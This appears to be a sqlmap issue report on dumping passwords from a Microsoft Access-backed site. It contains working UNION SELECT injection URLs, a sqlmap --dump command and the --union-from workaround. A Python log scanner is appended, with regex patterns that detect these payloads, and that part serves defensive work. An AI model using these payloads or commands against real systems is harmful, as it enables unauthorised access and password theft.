https://github.com/sqlmapproject/sqlmap/issues/423
Valid statements that show the numbers in the resulting html page:
...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
- foobar is an existing table (gathered via error messages in html)
- password is a valid column in the foobar table
The following URL gives you one password:
...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13 from foobar
Now I wanted to hand over to sqlmap to dump all passwords:
sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password --dump
which did not work out (0 entries retrieved), but it was confirmed that the table has several hundred entries.
- sqlmap was able to detect the number of columns is 13 (correct)
- sqlmap confirmed a boolean-based blind sqli vulnerability (but no UNION based sqli)
- sqlmap was able to confirm the existence of table name (with --tables) (echo foobar > txt/common-tables.txt)
- sqlmap was able to confirm the existence of column name password (with --columns)
When running something like:
--technique=U --union-cols=13 --union-char=1
sqlmap requested something *like*:
...id=-123 union all select 1,2,3,4,5,6,CHR(58)&CHR(111)&CHR(58),8,9,10,11,12,13 from MSysAccessObjects%00
which results in the following error message (shown in the html page):
The Microsoft Jet database engine cannot find the input table or query 'MSysAccessObjects'. Make sure it exists and that its name is spelled correctly.
So if sqlmap would accept a known tablename on the command line that it would use to detect/confirm the union based sqli vuln, instead of using "MSysAccessObjects", this would make sqlmap more useful (or simply use the table name specified in -T or previously bruteforced to detect union-based sqli).
solution:
Quote:
Now, in your case, you can (e.g.) use --union-from=foobar which will enforce usage of table name foobar in UNION query injection payloads
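From the defender's side, the request shapes quoted above (UNION SELECT with a fixed column count, a `CHR(..)&CHR(..)` marker, an `MSys*` system table and a trailing `%00`) are distinctive in web server logs. The following is an added example, not part of the original post or of sqlmap; it assumes combined-format access logs, and the indicator names, the `/item.asp` path and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Indicator names are hypothetical; patterns follow the requests quoted above.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "select_top": re.compile(r"\bselect\s+top\s+\d+\b", re.I),
    "access_system_table": re.compile(r"\bMSys\w+", re.I),
    "chr_concat_marker": re.compile(r"chr\(\d+\)\s*&\s*chr\(\d+\)", re.I),
    "null_byte_terminator": re.compile(r"\x00"),
}

# Assumed combined log format: client IP first, request line in double quotes.
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')


def scan_line(line):
    """Return (client_ip, sorted indicator names), or None if unparseable."""
    m = REQUEST.match(line)
    if not m:
        return None
    ip, target = m.groups()
    decoded = unquote_plus(target)  # one pass: %20, %26, %00 and '+'
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(decoded))
    return ip, hits


def scan_log(lines):
    """Return only the parsed lines that triggered at least one indicator."""
    parsed = (scan_line(line) for line in lines)
    return [p for p in parsed if p and p[1]]


# Constructed sample lines: documentation IPs and a hypothetical /item.asp page.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Mar/2015:00:57:01 +0000] "GET /item.asp?cat=2&id=123 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [18/Mar/2015:00:57:02 +0000] "GET /item.asp?cat=2&id=-123%20union%20all%20select%201,2,3,4,5,6,CHR(58)%26CHR(111)%26CHR(58),8,9,10,11,12,13%20from%20MSysAccessObjects%00 HTTP/1.1" 200 812',
    '203.0.113.9 - - [18/Mar/2015:00:57:09 +0000] "GET /item.asp?cat=2&id=123+union+select+top+1+1,2,3,4,5,6,7,8,9,10,11,12,13+from+foobar HTTP/1.1" 200 5301',
    '203.0.113.7 - - [18/Mar/2015:00:58:11 +0000] "GET /search.asp?q=student+union+events HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(hits))
```

The scan decodes each request target once, so double-encoded payloads need a second decoding pass before matching.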